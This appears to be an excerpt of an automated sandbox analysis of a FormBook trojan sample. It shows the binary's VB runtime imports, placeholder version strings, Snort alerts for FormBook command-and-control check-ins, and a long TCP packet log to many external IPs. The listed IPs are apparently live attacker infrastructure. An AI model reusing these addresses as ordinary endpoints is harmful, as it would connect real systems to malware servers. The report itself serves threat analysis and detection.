_CIcos, _adj_fptan, __vbaVarMove, __vbaHresultCheck, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, DllFunctionCall, __vbaLbound, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaStrComp, __vbaFpI4, __vbaVarTstGe, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Cx Frak
InternalName	prajesselv
FileVersion	1.00
CompanyName	Cx Frak
LegalTrademarks	Cx Frak
Comments	Cx Frak
ProductName	Cx Frak
ProductVersion	1.00
FileDescription	Cx Frak
OriginalFilename	prajesselv.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/01/21-10:33:52.934317	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49791	80	192.168.11.20	164.155.212.139
12/01/21-10:33:52.934317	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49791	80	192.168.11.20	164.155.212.139
12/01/21-10:33:52.934317	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49791	80	192.168.11.20	164.155.212.139
12/01/21-10:34:09.079701	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49793	34.102.136.180	192.168.11.20
12/01/21-10:34:14.661091	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49794	80	192.168.11.20	44.227.76.166
12/01/21-10:34:14.661091	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49794	80	192.168.11.20	44.227.76.166
12/01/21-10:34:14.661091	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49794	80	192.168.11.20	44.227.76.166
12/01/21-10:34:25.618849	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.11.20	216.250.120.206
12/01/21-10:34:25.618849	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.11.20	216.250.120.206
12/01/21-10:34:25.618849	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.11.20	216.250.120.206
12/01/21-10:34:33.989653	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
12/01/21-10:34:51.842337	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
12/01/21-10:35:52.145617	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49804	80	192.168.11.20	35.244.144.199
12/01/21-10:35:52.145617	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49804	80	192.168.11.20	35.244.144.199
12/01/21-10:35:52.145617	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49804	80	192.168.11.20	35.244.144.199
12/01/21-10:35:57.936308	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.11.20	185.68.16.57
12/01/21-10:35:57.936308	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.11.20	185.68.16.57
12/01/21-10:35:57.936308	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.11.20	185.68.16.57
12/01/21-10:36:26.346236	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1
12/01/21-10:36:27.644292	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
12/01/21-10:37:03.333530	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.11.20	104.21.82.227
12/01/21-10:37:03.333530	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.11.20	104.21.82.227
12/01/21-10:37:03.333530	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.11.20	104.21.82.227
12/01/21-10:37:09.237325	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	1.1.1.1
12/01/21-10:37:09.230279	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49813	80	192.168.11.20	34.102.136.180
12/01/21-10:37:09.230279	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49813	80	192.168.11.20	34.102.136.180
12/01/21-10:37:09.230279	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49813	80	192.168.11.20	34.102.136.180
12/01/21-10:37:09.337218	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49813	34.102.136.180	192.168.11.20
12/01/21-10:38:52.386453	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.11.20	34.237.47.210
12/01/21-10:38:52.386453	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.11.20	34.237.47.210
12/01/21-10:38:52.386453	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.11.20	34.237.47.210
12/01/21-10:39:02.574250	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.11.20	185.68.16.57
12/01/21-10:39:02.574250	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.11.20	185.68.16.57
12/01/21-10:39:02.574250	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.11.20	185.68.16.57
12/01/21-10:39:07.736439	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.11.20	3.64.163.50
12/01/21-10:39:07.736439	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.11.20	3.64.163.50
12/01/21-10:39:07.736439	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49820	80	192.168.11.20	3.64.163.50
12/01/21-10:39:17.808343	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	34.102.136.180
12/01/21-10:39:17.808343	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	34.102.136.180
12/01/21-10:39:17.808343	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49821	80	192.168.11.20	34.102.136.180
12/01/21-10:39:17.915040	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49821	34.102.136.180	192.168.11.20
12/01/21-10:39:22.938014	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49822	80	192.168.11.20	35.244.144.199
12/01/21-10:39:22.938014	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49822	80	192.168.11.20	35.244.144.199
12/01/21-10:39:22.938014	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49822	80	192.168.11.20	35.244.144.199
12/01/21-10:39:28.819187	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	44.227.76.166
12/01/21-10:39:28.819187	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	44.227.76.166
12/01/21-10:39:28.819187	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49823	80	192.168.11.20	44.227.76.166

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 10:32:46.912508965 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:46.912590981 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:46.912735939 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:46.930344105 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:46.930398941 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.212873936 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.213175058 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.362445116 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.362507105 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.363184929 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.363313913 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.366451025 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.407880068 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.501132965 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.501199961 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.501302004 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.501348019 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.501359940 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.501486063 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.501631975 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.630333900 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.630610943 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.630655050 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.631000996 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.631233931 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.631529093 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.631722927 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.631762028 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.761187077 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.761378050 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.761440039 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.761617899 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.761759996 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.761847019 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.762048006 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.762212038 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.762356043 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.762562037 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.762705088 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.762739897 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.762811899 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.762892962 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.763029099 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.763124943 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.763199091 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.763350010 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.763467073 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.763484955 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.763525009 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.763667107 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.763747931 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.893548012 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.893753052 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.893805981 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.894099951 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.894278049 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.894325972 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.894365072 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.894500017 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.894627094 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.894814014 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.894996881 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.895039082 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.895107985 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.895436049 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.895584106 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.895668983 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.895684004 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.895713091 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.895915031 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.896080971 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.896248102 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.896286011 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.896372080 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.896399975 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.896436930 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.896620989 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.896908998 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.897075891 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897135973 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.897236109 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897265911 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.897275925 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897378922 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897399902 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.897460938 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897548914 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897572041 CET	443	49790	162.241.120.147	192.168.11.20
Dec 1, 2021 10:32:47.897593975 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897653103 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:32:47.897705078 CET	49790	443	192.168.11.20	162.241.120.147
Dec 1, 2021 10:33:52.767080069 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:52.933922052 CET	80	49791	164.155.212.139	192.168.11.20
Dec 1, 2021 10:33:52.934247017 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:52.934317112 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:53.101428032 CET	80	49791	164.155.212.139	192.168.11.20
Dec 1, 2021 10:33:53.448585987 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:53.591156006 CET	80	49791	164.155.212.139	192.168.11.20
Dec 1, 2021 10:33:53.591224909 CET	80	49791	164.155.212.139	192.168.11.20
Dec 1, 2021 10:33:53.591423035 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:53.591527939 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:53.600418091 CET	80	49791	164.155.212.139	192.168.11.20
Dec 1, 2021 10:33:53.600665092 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:53.615554094 CET	80	49791	164.155.212.139	192.168.11.20
Dec 1, 2021 10:33:53.615912914 CET	49791	80	192.168.11.20	164.155.212.139
Dec 1, 2021 10:33:58.487242937 CET	49792	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:33:58.498003006 CET	80	49792	34.117.168.233	192.168.11.20
Dec 1, 2021 10:33:58.498218060 CET	49792	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:33:58.498277903 CET	49792	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:33:58.509098053 CET	80	49792	34.117.168.233	192.168.11.20
Dec 1, 2021 10:33:58.557224989 CET	80	49792	34.117.168.233	192.168.11.20
Dec 1, 2021 10:33:58.557276964 CET	80	49792	34.117.168.233	192.168.11.20
Dec 1, 2021 10:33:58.557621002 CET	49792	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:33:58.557683945 CET	49792	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:33:58.568382025 CET	80	49792	34.117.168.233	192.168.11.20
Dec 1, 2021 10:34:08.960184097 CET	49793	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:34:08.972671986 CET	80	49793	34.102.136.180	192.168.11.20
Dec 1, 2021 10:34:08.972820997 CET	49793	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:34:08.972954988 CET	49793	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:34:08.983690023 CET	80	49793	34.102.136.180	192.168.11.20
Dec 1, 2021 10:34:09.079700947 CET	80	49793	34.102.136.180	192.168.11.20
Dec 1, 2021 10:34:09.079755068 CET	80	49793	34.102.136.180	192.168.11.20
Dec 1, 2021 10:34:09.080063105 CET	49793	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:34:09.080117941 CET	49793	80	192.168.11.20	34.102.136.180
Dec 1, 2021 10:34:09.090769053 CET	80	49793	34.102.136.180	192.168.11.20
Dec 1, 2021 10:34:14.299438000 CET	49794	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:34:14.480890036 CET	80	49794	44.227.76.166	192.168.11.20
Dec 1, 2021 10:34:14.481142998 CET	49794	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:34:14.660938025 CET	80	49794	44.227.76.166	192.168.11.20
Dec 1, 2021 10:34:14.661091089 CET	49794	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:34:14.840703964 CET	80	49794	44.227.76.166	192.168.11.20
Dec 1, 2021 10:34:14.840756893 CET	80	49794	44.227.76.166	192.168.11.20
Dec 1, 2021 10:34:14.840791941 CET	80	49794	44.227.76.166	192.168.11.20
Dec 1, 2021 10:34:14.841056108 CET	49794	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:34:14.841111898 CET	49794	80	192.168.11.20	44.227.76.166
Dec 1, 2021 10:34:15.020883083 CET	80	49794	44.227.76.166	192.168.11.20
Dec 1, 2021 10:34:20.153681040 CET	49795	80	192.168.11.20	198.54.117.217
Dec 1, 2021 10:34:20.311239004 CET	80	49795	198.54.117.217	192.168.11.20
Dec 1, 2021 10:34:20.311572075 CET	49795	80	192.168.11.20	198.54.117.217
Dec 1, 2021 10:34:20.311655045 CET	49795	80	192.168.11.20	198.54.117.217
Dec 1, 2021 10:34:20.469357014 CET	80	49795	198.54.117.217	192.168.11.20
Dec 1, 2021 10:34:20.469410896 CET	80	49795	198.54.117.217	192.168.11.20
Dec 1, 2021 10:34:25.489372015 CET	49796	80	192.168.11.20	216.250.120.206
Dec 1, 2021 10:34:25.618580103 CET	80	49796	216.250.120.206	192.168.11.20
Dec 1, 2021 10:34:25.618766069 CET	49796	80	192.168.11.20	216.250.120.206
Dec 1, 2021 10:34:25.618849039 CET	49796	80	192.168.11.20	216.250.120.206
Dec 1, 2021 10:34:25.748111963 CET	80	49796	216.250.120.206	192.168.11.20
Dec 1, 2021 10:34:25.756627083 CET	80	49796	216.250.120.206	192.168.11.20
Dec 1, 2021 10:34:25.756695986 CET	80	49796	216.250.120.206	192.168.11.20
Dec 1, 2021 10:34:25.756745100 CET	80	49796	216.250.120.206	192.168.11.20
Dec 1, 2021 10:34:25.757102966 CET	49796	80	192.168.11.20	216.250.120.206
Dec 1, 2021 10:34:25.757205009 CET	49796	80	192.168.11.20	216.250.120.206
Dec 1, 2021 10:34:25.757222891 CET	49796	80	192.168.11.20	216.250.120.206
Dec 1, 2021 10:34:25.886605024 CET	80	49796	216.250.120.206	192.168.11.20
Dec 1, 2021 10:34:31.885253906 CET	49797	80	192.168.11.20	81.2.194.128
Dec 1, 2021 10:34:31.911434889 CET	80	49797	81.2.194.128	192.168.11.20
Dec 1, 2021 10:34:31.911669016 CET	49797	80	192.168.11.20	81.2.194.128
Dec 1, 2021 10:34:31.911740065 CET	49797	80	192.168.11.20	81.2.194.128
Dec 1, 2021 10:34:31.937907934 CET	80	49797	81.2.194.128	192.168.11.20
Dec 1, 2021 10:34:31.939558983 CET	80	49797	81.2.194.128	192.168.11.20
Dec 1, 2021 10:34:31.939620972 CET	80	49797	81.2.194.128	192.168.11.20
Dec 1, 2021 10:34:31.939662933 CET	80	49797	81.2.194.128	192.168.11.20
Dec 1, 2021 10:34:31.939970970 CET	49797	80	192.168.11.20	81.2.194.128
Dec 1, 2021 10:34:31.940022945 CET	49797	80	192.168.11.20	81.2.194.128
Dec 1, 2021 10:34:31.966183901 CET	80	49797	81.2.194.128	192.168.11.20
Dec 1, 2021 10:34:36.976644993 CET	49798	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:34:37.004842043 CET	80	49798	185.61.153.97	192.168.11.20
Dec 1, 2021 10:34:37.005203962 CET	49798	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:34:37.005281925 CET	49798	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:34:37.034074068 CET	80	49798	185.61.153.97	192.168.11.20
Dec 1, 2021 10:34:37.034126043 CET	80	49798	185.61.153.97	192.168.11.20
Dec 1, 2021 10:34:37.034498930 CET	49798	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:34:37.034547091 CET	49798	80	192.168.11.20	185.61.153.97
Dec 1, 2021 10:34:37.062819958 CET	80	49798	185.61.153.97	192.168.11.20
Dec 1, 2021 10:34:42.359137058 CET	49799	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:34:43.359318018 CET	49799	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:34:43.456187963 CET	80	49799	185.98.5.234	192.168.11.20
Dec 1, 2021 10:34:43.456486940 CET	49799	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:34:43.456566095 CET	49799	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:34:43.553796053 CET	80	49799	185.98.5.234	192.168.11.20
Dec 1, 2021 10:34:43.554660082 CET	80	49799	185.98.5.234	192.168.11.20
Dec 1, 2021 10:34:43.554765940 CET	80	49799	185.98.5.234	192.168.11.20
Dec 1, 2021 10:34:43.555093050 CET	49799	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:34:43.555104017 CET	49799	80	192.168.11.20	185.98.5.234
Dec 1, 2021 10:34:43.651406050 CET	80	49799	185.98.5.234	192.168.11.20
Dec 1, 2021 10:35:07.339750051 CET	49800	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:35:07.497813940 CET	80	49800	50.118.200.120	192.168.11.20
Dec 1, 2021 10:35:07.498086929 CET	49800	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:35:07.498178959 CET	49800	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:35:07.659982920 CET	80	49800	50.118.200.120	192.168.11.20
Dec 1, 2021 10:35:07.660057068 CET	80	49800	50.118.200.120	192.168.11.20
Dec 1, 2021 10:35:07.660465956 CET	49800	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:35:07.660567999 CET	49800	80	192.168.11.20	50.118.200.120
Dec 1, 2021 10:35:07.818892002 CET	80	49800	50.118.200.120	192.168.11.20
Dec 1, 2021 10:35:12.787503958 CET	49801	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:35:12.879786015 CET	80	49801	199.59.242.153	192.168.11.20
Dec 1, 2021 10:35:12.880031109 CET	49801	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:35:12.880086899 CET	49801	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:35:12.973201990 CET	80	49801	199.59.242.153	192.168.11.20
Dec 1, 2021 10:35:12.973783970 CET	80	49801	199.59.242.153	192.168.11.20
Dec 1, 2021 10:35:12.973841906 CET	80	49801	199.59.242.153	192.168.11.20
Dec 1, 2021 10:35:12.973880053 CET	80	49801	199.59.242.153	192.168.11.20
Dec 1, 2021 10:35:12.974231005 CET	49801	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:35:12.974278927 CET	49801	80	192.168.11.20	199.59.242.153
Dec 1, 2021 10:35:36.301650047 CET	49802	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:35:36.310388088 CET	80	49802	34.117.168.233	192.168.11.20
Dec 1, 2021 10:35:36.310570955 CET	49802	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:35:36.310657024 CET	49802	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:35:36.319144011 CET	80	49802	34.117.168.233	192.168.11.20
Dec 1, 2021 10:35:36.370280981 CET	80	49802	34.117.168.233	192.168.11.20
Dec 1, 2021 10:35:36.370296955 CET	80	49802	34.117.168.233	192.168.11.20
Dec 1, 2021 10:35:36.370659113 CET	49802	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:35:36.370675087 CET	49802	80	192.168.11.20	34.117.168.233
Dec 1, 2021 10:35:36.381062984 CET	80	49802	34.117.168.233	192.168.11.20
Dec 1, 2021 10:35:46.634602070 CET	49803	80	192.168.11.20	154.23.172.127
Dec 1, 2021 10:35:46.800298929 CET	80	49803	154.23.172.127	192.168.11.20
Dec 1, 2021 10:35:46.800615072 CET	49803	80	192.168.11.20	154.23.172.127
Dec 1, 2021 10:35:46.800699949 CET	49803	80	192.168.11.20	154.23.172.127
Dec 1, 2021 10:35:46.966475010 CET	80	49803	154.23.172.127	192.168.11.20
Dec 1, 2021 10:35:46.968986034 CET	80	49803	154.23.172.127	192.168.11.20
Dec 1, 2021 10:35:46.969036102 CET	80	49803	154.23.172.127	192.168.11.20
Dec 1, 2021 10:35:46.969281912 CET	49803	80	192.168.11.20	154.23.172.127
Dec 1, 2021 10:35:46.969348907 CET	49803	80	192.168.11.20	154.23.172.127
Dec 1, 2021 10:35:47.134897947 CET	80	49803	154.23.172.127	192.168.11.20
Dec 1, 2021 10:35:52.134646893 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.145292044 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.145519972 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.145617008 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.156187057 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.441819906 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.441884041 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.441931963 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.441965103 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.442111969 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.442306995 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.442365885 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.455840111 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.455919981 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.455956936 CET	80	49804	35.244.144.199	192.168.11.20
Dec 1, 2021 10:35:52.456074953 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.456125975 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:52.456139088 CET	49804	80	192.168.11.20	35.244.144.199
Dec 1, 2021 10:35:57.901905060 CET	49805	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:35:57.936062098 CET	80	49805	185.68.16.57	192.168.11.20
Dec 1, 2021 10:35:57.936249971 CET	49805	80	192.168.11.20	185.68.16.57
Dec 1, 2021 10:35:57.936307907 CET	49805	80	192.168.11.20	185.68.16.57
